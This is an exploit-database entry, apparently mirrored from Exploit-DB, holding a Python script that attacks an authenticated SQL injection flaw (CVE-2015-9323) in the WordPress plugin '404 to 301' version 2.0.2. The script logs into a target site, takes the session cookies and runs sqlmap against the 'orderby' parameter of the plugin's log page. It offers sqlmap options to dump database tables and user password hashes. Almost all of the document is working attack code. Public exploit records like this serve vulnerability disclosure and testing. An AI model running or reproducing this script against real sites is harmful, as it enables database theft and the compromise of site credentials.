WordPress Plugin 404 to 301 2.0.2 – SQL-Injection (Authenticated)

  • 作者: Ron Jost
    日期: 2022-02-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50698/
  • # Exploit Title: WordPress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)
# Date 30.01.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://de.wordpress.org/plugins/404-to-301/
# Software Link: https://downloads.wordpress.org/plugin/404-to-301.2.0.2.zip
# Version: <= 2.0.2
# Tested on: Ubuntu 20.04
# CVE: CVE-2015-9323
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2015-9323/README.md

'''
Description:
The 404-to-301 plugin before 2.0.3 for WordPress has SQL injection.
'''

banner = ''' 
 
 .o88b. dbdb d88888b.d888b..d88b. db ooooo.d888b. d8888b. .d888b. d8888b. 
d8PY8 8888 88'VP`8D .8P88. o888P~~~~88' `8D VP`8D VP`8D VP`8D 
8PY88P 88ooooo odD' 88d'8888 dP `V8o88' oooY'odD' oooY' 
8b`8bd8' 88~~~~~ C8888D.88' 88 d' 8888 V8888b. C8888Dd8'~~~b..88' ~~~b. 
Y8bd8`8bd8'88.j88.`88d8'88 `8Dd8' db 8D j88.db 8D 
 `Y88P'YPY88888P888888D`Y88P' VP 88oobY' d8'Y8888P' 888888D Y8888P' 

[+] 404 to 301 - SQL-Injection 
[@] Developed by Ron Jost (Hacker5preme)

'''
print(banner)

import argparse
import os
import requests
from datetime import datetime
import json

# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin 404 to 301 - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD

print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))


# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)

# SQL-Injection (Exploit):

# Generate payload for sqlmap
print ('[+] Payload for sqlmap exploitation:')
cookies_session = session.cookies.get_dict()
cookie = json.dumps(cookies_session)
cookie = cookie.replace('"}','')
cookie = cookie.replace('{"', '')
cookie = cookie.replace('"', '')
cookie = cookie.replace(" ", '')
cookie = cookie.replace(":", '=')
cookie = cookie.replace(',', '; ')

exploit_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=i4t3-logs&orderby=1"'
exploit_risk = ' --level 2 --risk 2'
exploit_cookie = r' --cookie="' + cookie + r'" '

print('Sqlmap options:')
print(' -a, --all Retrieve everything')
print(' -b, --bannerRetrieve DBMS banner')
print(' --current-userRetrieve DBMS current user')
print(' --current-dbRetrieve DBMS current database')
print(' --passwords Enumerate DBMS users password hashes')
print(' --tablesEnumerate DBMS database tables')
print(' --columns Enumerate DBMS database table column')
print(' --schemaEnumerate DBMS schema')
print(' --dumpDump DBMS database table entries')
print(' --dump-allDump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploit_code = exploit_url + exploit_risk + exploit_cookie + retrieve_mode + ' -p orderby -v0'
os.system(exploit_code)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))